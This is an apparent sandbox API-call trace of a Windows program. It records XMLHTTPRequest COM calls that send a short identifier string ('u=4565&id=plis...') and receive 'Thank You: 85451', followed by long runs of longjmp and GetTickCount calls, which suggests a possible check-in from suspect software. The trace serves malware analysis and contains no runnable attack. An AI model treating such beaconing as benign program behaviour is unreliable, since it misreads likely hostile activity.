	[0202.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0202.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0202.801] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0202.801] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0202.801] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0202.801] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0202.801] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0202.801] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0202.802] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0202.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0202.802] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0202.802] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0202.802] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0202.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0202.802] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0202.802] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0202.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0202.802] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0202.803] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0202.803] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0202.803] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0202.803] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0202.804] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0202.804] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0213.085] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0213.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0213.085] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0213.085] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0213.085] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0213.085] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 85451", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0213.085] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0213.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0213.086] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0213.086] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0213.086] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0213.086] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0213.086] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0213.087] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0213.088] malloc (_Size=0xa8) returned 0x3de0b0
	[0213.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0213.090] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0213.090] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0213.090] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0213.091] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0213.091] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0213.092] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0213.092] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0213.092] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0213.095] longjmp () 
	[0213.095] longjmp () 
	[0213.098] longjmp () 
	[0213.099] GetCurrentThreadId () returned 0x9a8
	[0213.099] GetCurrentThreadId () returned 0x9a8
	[0213.099] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0213.099] malloc (_Size=0x80) returned 0x3c88b0
	[0213.099] longjmp () 
	[0213.099] GetTickCount () returned 0x116a2a6
	[0213.100] GetTickCount () returned 0x116a2a6
	[0213.100] longjmp () 
	[0213.100] longjmp () 
	[0213.100] longjmp () 
	[0213.100] longjmp () 
	[0213.101] longjmp () 
	[0213.101] longjmp () 
	[0213.101] longjmp () 
	[0213.101] longjmp () 
	[0213.102] longjmp () 
	[0213.102] longjmp () 
	[0213.102] longjmp () 
	[0213.102] longjmp () 
	[0213.103] longjmp () 
	[0213.103] longjmp () 
	[0213.103] longjmp () 
	[0213.103] longjmp () 
	[0213.104] longjmp () 
	[0213.104] longjmp () 
	[0213.104] longjmp () 
	[0213.104] longjmp () 
	[0213.105] longjmp () 
	[0213.105] longjmp () 
	[0213.105] longjmp () 
	[0213.105] longjmp () 
	[0213.106] longjmp () 
	[0213.106] longjmp () 
	[0213.106] longjmp () 
	[0213.106] longjmp () 
	[0213.107] longjmp () 
	[0213.107] longjmp () 
	[0213.107] longjmp () 
	[0213.107] longjmp () 
	[0213.108] GetTickCount () returned 0x116a2a6
	[0213.108] longjmp () 
	[0213.108] longjmp () 
	[0213.108] longjmp () 
	[0213.109] longjmp () 
	[0213.109] longjmp () 
	[0213.109] longjmp () 
	[0213.109] longjmp () 
	[0213.110] longjmp () 
	[0213.110] longjmp () 
	[0213.111] longjmp () 
	[0213.111] longjmp () 
	[0213.112] longjmp () 
	[0213.112] longjmp () 
	[0213.113] longjmp () 
	[0213.113] longjmp () 
	[0213.113] longjmp () 
	[0213.114] longjmp () 
	[0213.114] longjmp () 
	[0213.114] longjmp () 
	[0213.114] longjmp () 
	[0213.115] longjmp () 
	[0213.115] longjmp () 
	[0213.115] longjmp () 
	[0213.115] longjmp () 
	[0213.116] longjmp () 
	[0213.116] longjmp () 
	[0213.117] longjmp () 
	[0213.117] longjmp () 
	[0213.117] longjmp () 
	[0213.117] longjmp () 
	[0213.118] longjmp () 
	[0213.118] longjmp () 
	[0213.118] GetTickCount () returned 0x116a2b6
	[0213.119] longjmp () 
	[0213.119] longjmp () 
	[0213.119] longjmp () 
	[0213.119] longjmp () 
	[0213.120] longjmp () 
	[0213.120] longjmp () 
	[0213.121] longjmp () 
	[0213.121] longjmp () 
	[0213.121] longjmp () 
	[0213.122] longjmp () 
	[0213.122] longjmp () 
	[0213.122] longjmp () 
	[0213.123] longjmp () 
	[0213.123] longjmp () 
	[0213.123] longjmp () 
	[0213.124] longjmp () 
	[0213.124] longjmp () 
	[0213.124] longjmp () 
	[0213.125] longjmp () 
	[0213.125] longjmp () 
	[0213.126] longjmp () 
	[0213.126] longjmp () 
	[0213.126] longjmp () 
	[0213.126] longjmp () 
	[0213.127] longjmp () 
	[0213.127] longjmp () 
	[0213.128] longjmp () 
	[0213.128] longjmp () 
	[0213.128] longjmp () 
	[0213.129] longjmp () 
	[0213.129] longjmp () 
	[0213.129] longjmp () 
	[0213.130] GetTickCount () returned 0x116a2c5
	[0213.130] longjmp () 
	[0213.130] longjmp () 
	[0213.131] longjmp () 
	[0213.131] longjmp () 
	[0213.131] longjmp () 
	[0213.132] longjmp () 
	[0213.132] longjmp () 
	[0213.132] longjmp () 
	[0213.133] longjmp () 
	[0213.133] longjmp () 
	[0213.133] longjmp () 
	[0213.134] longjmp () 
	[0213.134] longjmp () 
	[0213.134] longjmp () 
	[0213.135] longjmp () 
	[0213.135] longjmp () 
	[0213.135] longjmp () 
	[0213.136] longjmp () 
	[0213.136] longjmp () 
	[0213.136] longjmp () 
	[0213.137] longjmp () 
	[0213.137] longjmp () 
	[0213.138] longjmp () 
	[0213.138] longjmp () 
	[0213.139] longjmp () 
	[0213.139] longjmp () 
	[0213.139] longjmp () 
	[0213.140] longjmp () 
	[0213.140] longjmp () 
	[0213.141] longjmp () 
	[0213.141] longjmp () 
	[0213.141] longjmp () 
	[0213.142] GetTickCount () returned 0x116a2c5
	[0213.142] longjmp () 
	[0213.142] longjmp () 
	[0213.143] longjmp () 
	[0213.143] longjmp () 
	[0213.144] longjmp () 
	[0213.144] longjmp () 
	[0213.144] longjmp () 
	[0213.144] longjmp () 
	[0213.145] longjmp () 
	[0213.145] longjmp () 
	[0213.145] longjmp () 
	[0213.146] longjmp () 
	[0213.146] longjmp () 
	[0213.147] longjmp () 
	[0213.147] longjmp () 
	[0213.147] longjmp () 
	[0213.148] longjmp () 
	[0213.148] longjmp () 
	[0213.148] longjmp () 
	[0213.148] longjmp () 
	[0213.149] longjmp () 
	[0213.149] longjmp () 
	[0213.150] longjmp () 
	[0213.150] longjmp () 
	[0213.150] longjmp () 
	[0213.151] longjmp () 
	[0213.151] longjmp () 
	[0213.151] longjmp () 
	[0213.151] longjmp () 
	[0213.152] longjmp () 
	[0213.152] longjmp () 
	[0213.152] longjmp () 
	[0213.153] GetTickCount () returned 0x116a2d5
	[0213.153] longjmp () 
	[0213.153] longjmp () 
	[0213.153] longjmp () 
	[0213.154] longjmp () 
	[0213.154] longjmp () 
	[0213.155] longjmp () 
	[0213.155] longjmp () 
	[0213.155] longjmp () 
	[0213.156] longjmp () 
	[0213.156] longjmp () 
	[0213.156] longjmp () 
	[0213.156] longjmp () 
	[0213.157] longjmp () 
	[0213.157] longjmp () 
	[0213.157] longjmp () 
	[0213.158] longjmp () 
	[0213.158] longjmp () 
	[0213.159] longjmp () 
	[0213.159] longjmp () 
	[0213.159] longjmp () 
	[0213.160] longjmp () 
	[0213.160] longjmp () 
	[0213.160] longjmp () 
	[0213.160] longjmp () 
	[0213.161] longjmp () 
	[0213.161] longjmp () 
	[0213.161] longjmp () 
	[0213.161] longjmp () 
	[0213.162] longjmp () 
	[0213.162] longjmp () 
	[0213.162] longjmp () 
	[0213.163] longjmp () 
	[0213.163] GetTickCount () returned 0x116a2e4
	[0213.163] longjmp () 
	[0213.163] longjmp () 
	[0213.163] longjmp () 
	[0213.164] longjmp () 
	[0213.164] longjmp () 
	[0213.164] longjmp () 
	[0213.165] longjmp () 
	[0213.165] longjmp () 
	[0213.165] longjmp () 
	[0213.166] longjmp () 
	[0213.166] longjmp () 
	[0213.166] longjmp () 
	[0213.166] longjmp () 
	[0213.167] longjmp () 
	[0213.167] longjmp () 
	[0213.167] longjmp () 
	[0213.168] longjmp () 
	[0213.168] longjmp () 
	[0213.168] longjmp () 
	[0213.168] longjmp () 
	[0213.169] longjmp () 
	[0213.169] longjmp () 
	[0213.169] longjmp () 
	[0213.170] longjmp () 
	[0213.170] longjmp () 
	[0213.171] longjmp () 
	[0213.171] longjmp () 
	[0213.171] longjmp () 
	[0213.172] longjmp () 
	[0213.172] longjmp () 
	[0213.172] longjmp () 
	[0213.172] longjmp () 
	[0213.173] GetTickCount () returned 0x116a2e4
	[0213.173] longjmp () 
	[0213.173] longjmp () 
	[0213.174] longjmp () 
	[0213.174] longjmp () 
	[0213.174] longjmp () 
	[0213.176] longjmp () 
	[0213.176] longjmp () 
	[0213.176] longjmp () 
	[0213.177] longjmp () 
	[0213.177] longjmp () 
	[0213.177] longjmp () 
	[0213.178] longjmp () 
	[0213.178] longjmp () 
	[0213.178] longjmp () 
	[0213.179] longjmp () 
	[0213.179] longjmp () 
	[0213.179] longjmp () 
	[0213.180] longjmp () 
	[0213.180] longjmp () 
	[0213.180] longjmp () 
	[0213.180] longjmp () 
	[0213.181] longjmp () 
	[0213.181] longjmp () 
	[0213.181] longjmp () 
	[0213.182] longjmp () 
	[0213.182] longjmp () 
	[0213.182] longjmp () 
	[0213.182] longjmp () 
	[0213.183] longjmp () 
	[0213.183] longjmp () 
	[0213.183] longjmp () 
	[0213.183] longjmp () 
	[0213.184] GetTickCount () returned 0x116a2f4
	[0213.184] longjmp () 
	[0213.184] longjmp () 
	[0213.184] longjmp () 
	[0213.185] longjmp () 
	[0213.185] longjmp () 
	[0213.185] longjmp () 
	[0213.185] longjmp () 
	[0213.186] longjmp () 
	[0213.186] longjmp () 
	[0213.186] longjmp () 
	[0213.186] longjmp () 
	[0213.187] longjmp () 
	[0213.187] longjmp () 
	[0213.187] longjmp () 
	[0213.188] longjmp () 
	[0213.188] longjmp () 
	[0213.188] longjmp () 
	[0213.188] longjmp () 
	[0213.188] longjmp () 
	[0213.189] longjmp () 
	[0213.189] longjmp () 
	[0213.189] longjmp () 
	[0213.189] longjmp () 
	[0213.190] longjmp () 
	[0213.190] longjmp () 
	[0213.191] longjmp () 
	[0213.191] longjmp () 
	[0213.191] longjmp () 
	[0213.191] longjmp () 
	[0213.192] longjmp () 
	[0213.192] longjmp () 
	[0213.192] longjmp () 
	[0213.192] GetTickCount () returned 0x116a304
	[0213.192] longjmp () 
	[0213.193] longjmp () 
	[0213.193] longjmp () 
	[0213.193] longjmp () 
	[0213.193] longjmp () 
	[0213.193] longjmp () 
	[0213.194] longjmp () 
	[0213.194] longjmp () 
	[0213.194] longjmp () 
	[0213.194] longjmp () 
	[0213.195] longjmp () 
	[0213.195] longjmp () 
	[0213.195] longjmp () 
	[0213.195] longjmp () 
	[0213.196] longjmp () 
	[0213.196] longjmp () 
	[0213.196] longjmp () 
	[0213.196] longjmp () 
	[0213.196] longjmp () 
	[0213.197] longjmp () 
	[0213.197] longjmp () 
	[0213.197] longjmp () 
	[0213.197] longjmp () 
	[0213.198] longjmp () 
	[0213.198] longjmp () 
	[0213.198] longjmp () 
	[0213.198] longjmp () 
	[0213.199] longjmp () 
	[0213.199] longjmp () 
	[0213.199] longjmp () 
	[0213.200] longjmp () 
	[0213.200] longjmp () 
	[0213.200] GetTickCount () returned 0x116a304
	[0213.200] longjmp () 
	[0213.200] longjmp () 
	[0213.201] longjmp () 
	[0213.201] longjmp () 
	[0213.201] longjmp () 
	[0213.201] longjmp () 
	[0213.202] longjmp () 
	[0213.202] longjmp () 
	[0213.202] longjmp () 
	[0213.202] longjmp () 
	[0213.203] longjmp () 
	[0213.203] longjmp () 
	[0213.203] longjmp () 
	[0213.203] longjmp () 
	[0213.203] longjmp () 
	[0213.204] longjmp () 
	[0213.204] longjmp () 
	[0213.204] longjmp () 
	[0213.204] longjmp () 
	[0213.205] longjmp () 
	[0213.205] longjmp () 
	[0213.205] longjmp () 
	[0213.205] longjmp () 
	[0213.206] longjmp () 
	[0213.207] longjmp () 
	[0213.207] longjmp () 
	[0213.207] longjmp () 
	[0213.207] longjmp () 
	[0213.208] longjmp () 
	[0213.208] longjmp () 
	[0213.208] longjmp () 
	[0213.208] longjmp () 
	[0213.209] GetTickCount () returned 0x116a313
	[0213.209] longjmp () 
	[0213.209] longjmp () 
	[0213.209] longjmp () 
	[0213.209] longjmp () 
	[0213.210] longjmp () 
	[0213.210] longjmp () 
	[0213.210] longjmp () 
	[0213.210] longjmp () 
	[0213.211] longjmp () 
	[0213.211] longjmp () 
	[0213.211] longjmp () 
	[0213.211] longjmp () 
	[0213.212] longjmp () 
	[0213.212] longjmp () 
	[0213.212] longjmp () 
	[0213.212] longjmp () 
	[0213.213] longjmp () 
